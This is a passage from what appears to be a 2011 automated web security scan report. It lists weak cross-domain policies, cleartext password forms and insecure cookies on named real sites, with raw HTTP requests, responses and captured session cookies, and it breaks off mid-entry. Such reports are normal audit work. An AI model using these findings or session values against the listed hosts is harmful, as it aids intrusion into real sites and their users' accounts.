Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: blogs.adobe.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:40:18 GMT
Server: Apache
Last-Modified: Wed, 03 Feb 2010 03:49:59 GMT
ETag: "12c0a86-d8-47eaa1cc427c0"
Accept-Ranges: bytes
Content-Length: 216
Connection: close
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*.adobe.com" />

</cross
...[SNIP]...

4.15. http://bstats.adbrite.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bstats.adbrite.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: bstats.adbrite.com

Response

HTTP/1.1 200 OK
Content-Type: text/x-cross-domain-policy
Content-Length: 398
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Tue, 12 Jul 2011 20:40:10 GMT

<?xml version="1.0" encoding="UTF-8"?>
<!-- AdBrite crossdomain.xml for BritePic and BriteFlic -->
<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.adbrite.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...

4.16. http://www.apple.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.apple.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apple.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 02 Jun 2005 16:16:28 GMT
ETag: "8d-3f8918f48ef00"
Server: Apache/2.2.14 (Unix)
X-N: S
X-Cached-Time: Mon, 21 Mar 2011 16:49:30 GMT
nnCoection: close
Content-Type: application/xml
Content-Length: 141
Cache-Control: max-age=494
Expires: Tue, 12 Jul 2011 18:07:19 GMT
Date: Tue, 12 Jul 2011 17:59:05 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="wdirect.apple.com" />
<allow-access-from domain="*.apple.com" />
</cross-domain-policy>

4.17. http://www.youtube.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 03 Jun 2011 20:25:01 GMT
Date: Tue, 12 Jul 2011 20:46:29 GMT
Expires: Tue, 12 Jul 2011 20:46:29 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>
<!-- http://www.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

4.18. http://stats.wordpress.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.wordpress.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: stats.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 12 Jul 2011 20:47:00 GMT
Content-Type: text/xml
Connection: close
Content-Length: 585
Last-Modified: Wed, 27 Apr 2011 19:01:50 GMT
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><site-control permitted-cross-domain-policies="master-only" /><allow-access-from domain="v.wordpress.com" to-ports="80,443" /><allow-access-from domain="v0.wordpress.com" to-ports="80,443" secure="false" /><allow-access-from domain="videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="s0.videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="realeyes.com" to-ports="80,443" />
...[SNIP]...

5. Silverlight cross-domain policy  previous  next
There are 5 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://b.scorecardresearch.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Wed, 13 Jul 2011 20:46:59 GMT
Date: Tue, 12 Jul 2011 20:46:59 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

5.2. http://metrics.apple.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.apple.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.apple.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:59:13 GMT
Server: Omniture DC/2.0.0
xserver: www179
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.3. http://mtrcs.popcap.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mtrcs.popcap.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: mtrcs.popcap.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:39:19 GMT
Server: Omniture DC/2.0.0
xserver: www262
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.4. http://stats.adobe.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.adobe.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: stats.adobe.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:40:24 GMT
Server: Omniture DC/2.0.0
xserver: www10
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.5. http://stats.wordpress.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.wordpress.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: stats.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 12 Jul 2011 20:47:00 GMT
Content-Type: text/xml
Connection: close
Content-Length: 309
Last-Modified: Wed, 18 May 2011 03:55:47 GMT
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>

...[SNIP]...

6. Cleartext submission of password  previous  next
There are 4 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


6.1. http://apps.ccbill.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apps.ccbill.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ccbill.com/developers/faq.php
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.3.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:02:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Drectory-Script: eSyndiCat Pro v2.3.02
Content-Type: text/html; charset=utf-8
Content-Length: 19391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<!-- accounts box start -->
           <form action="http://apps.ccbill.com/login.php" method="post">
           <table class="no" cellpadding="2" cellspacing="0">
...[SNIP]...
<br />
                   <input type="password" tabindex="2" class="text" name="password" size="18" value="" />
               </td>
...[SNIP]...

6.2. http://apps.ccbill.com/General-Website-Tools/Send-ACH-through-CCBill-l13.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apps.ccbill.com
Path:   /General-Website-Tools/Send-ACH-through-CCBill-l13.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /General-Website-Tools/Send-ACH-through-CCBill-l13.html HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://apps.ccbill.com/
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.4.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c; PHPSESSID=6nflcqbla83qcbamgrdcq2p1n1; cookiePageWidth=920px; cookieLetterSize=1em; box_content_20=block; box_content_21=block; box_content_6=block; box_content_22=block; first=foo

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:02:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Drectory-Script: eSyndiCat Pro v2.3.02
Content-Type: text/html; charset=utf-8
Content-Length: 20399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<!-- accounts box start -->
           <form action="http://apps.ccbill.com/login.php" method="post">
           <table class="no" cellpadding="2" cellspacing="0">
...[SNIP]...
<br />
                   <input type="password" tabindex="2" class="text" name="password" size="18" value="" />
               </td>
...[SNIP]...

6.3. http://apps.ccbill.com/p/developer.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apps.ccbill.com
Path:   /p/developer.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /p/developer.html HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://apps.ccbill.com/
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.6.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c; PHPSESSID=6nflcqbla83qcbamgrdcq2p1n1; cookiePageWidth=920px; cookieLetterSize=1em; box_content_20=block; box_content_21=block; box_content_6=block; box_content_22=block; first=foo

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:03:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Drectory-Script: eSyndiCat Pro v2.3.02
Content-Type: text/html; charset=utf-8
Content-Length: 25506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<!-- accounts box start -->
           <form action="http://apps.ccbill.com/login.php" method="post">
           <table class="no" cellpadding="2" cellspacing="0">
...[SNIP]...
<br />
                   <input type="password" tabindex="2" class="text" name="password" size="18" value="" />
               </td>
...[SNIP]...

6.4. http://ucc.state.ri.us/loginsystem/login_form.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ucc.state.ri.us
Path:   /loginsystem/login_form.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /loginsystem/login_form.asp HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/loginsystem/login.asp?FilingMethod=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:48:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 12492
Content-Type: text/html
Expires: Tue, 12 Jul 2011 00:48:06 GMT
Cache-control: no-cache


<HTML>

<HEAD>
<Title>State of Rhode Island and Providence Plantations </title>

<style type="text/css">
.label {
   font-family: "Courier New", Courier, monospace;
   font-size: 8pt;
   color: G
...[SNIP]...
<br>
   <form name="Login_Form" method="post" action="CheckLogin.asp" OnSubmit="return InternetValidation(this)">
    <table border="0" cellpadding="4" cellspacing="0" width="100%">
...[SNIP]...
<td width="76%">
<input type="password" name="PIN" maxlength=4 size="30"
           onMouseOver="window.status='Please enter your PIN Number. If you have forgotten your PIN please contact us at corp_pin@sos.ri.gov.'; return true;"
           onMouseOut ="window.status=''; return true;">

        </td>
...[SNIP]...

7. SSL cookie without secure flag set  previous  next
There are 115 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


7.1. https://www.chase.com/index.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.chase.com
Path:   /index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /index.jsp?pg_name=ccpmapp/smallbusiness/business_banking/page/bb_checking_overview HTTP/1.1
Host: www.chase.com
Connection: keep-alive
Referer: https://www.chase.com/ccp/index.jsp?pg_name=ccpmapp/shared/assets/page/zipcode&targeturl=https%3A%2F%2Fwww.chase.com%3A443%2Findex.jsp%3Fpg_name%3Dccpmapp%2Fsmallbusiness%2Fbusiness_banking%2Fpage%2Fbb_checking_overview
Content-Length: 200
Cache-Control: max-age=0
Origin: https://www.chase.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; DCTMSESSION=zrCbTczJG7b5gdC2pkJLRXST1yLZ7DJLL5Mmcv9PzCS1PvTnvVJV!1300205596; s_cc=true; s_sq=jpmcchasecom%3D%2526pid%253Dhttps%25253A//www.chase.com/ccp/index.jsp%25253Fpg_name%25253Dccpmapp/individuals/shared/page/OpenAnAccount%2526oid%253Dhttp%25253A//www.chase.com/ccp/index.jsp%25253Fpg_name%25253Dccpmapp/smallbusiness/business_banking/page/bb_checking_o%2526ot%253DA

targeturl=https%253A%252F%252Fwww.chase.com%253A443%252Findex.jsp%253Fpg_name%253Dccpmapp%252Fsmallbusiness%252Fbusiness_banking%252Fpage%252Fbb_checking_overview&zipcode=10011&submit.x=19&submit.y=13

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Tue, 12 Jul 2011 16:27:58 GMT
Content-length: 3726
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Set-Cookie: DCTMSESSION=b3htTc2TXm501fjhWlLCyxYR5L9TfZdjhpBQbQLJvRlyl8ClTHFL!1272186516; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
>
<html lang="en">
<HEAD>
<TITLE>
</TITLE>
<script language="JavaScript">


//-----------------------------------
...[SNIP]...

7.2. https://admin.ccbill.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmc=250776793; __utmb=250776793.6.10.1310490247

Response

HTTP/1.1 302 Found
Date: Tue, 12 Jul 2011 17:14:51 GMT
Location: login.cgi
Content-Length: 193
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="login.cgi">here</a>.</p>
</body></html>

7.3. https://admin.ccbill.com/adminBanners/blank.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /adminBanners/blank.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adminBanners/blank.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:02 GMT
Last-Modified: Sat, 23 Oct 2010 00:42:07 GMT
ETag: "53eb57-31-4933e075355c0"
Accept-Ranges: bytes
Content-Length: 49
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89a...................!.......,...........T..;

7.4. https://admin.ccbill.com/ccbillLogin.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /ccbillLogin.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccbillLogin.css?2 HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:03 GMT
Last-Modified: Sat, 23 Oct 2010 00:03:54 GMT
ETag: "41124b-3b31-4933d7ea6ee80"
Accept-Ranges: bytes
Content-Length: 15153
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

html {
height: 100%;
}
body {
margin: 0px;
height: 100%;
width: 100%;
padding: 0px;
background-color:white;
scrollbar-3d-light-color:#cccccc;
scrollbar-arrow-
...[SNIP]...

7.5. https://admin.ccbill.com/ext-2.2/adapter/ext/ext-base.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /ext-2.2/adapter/ext/ext-base.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/adapter/ext/ext-base.js HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
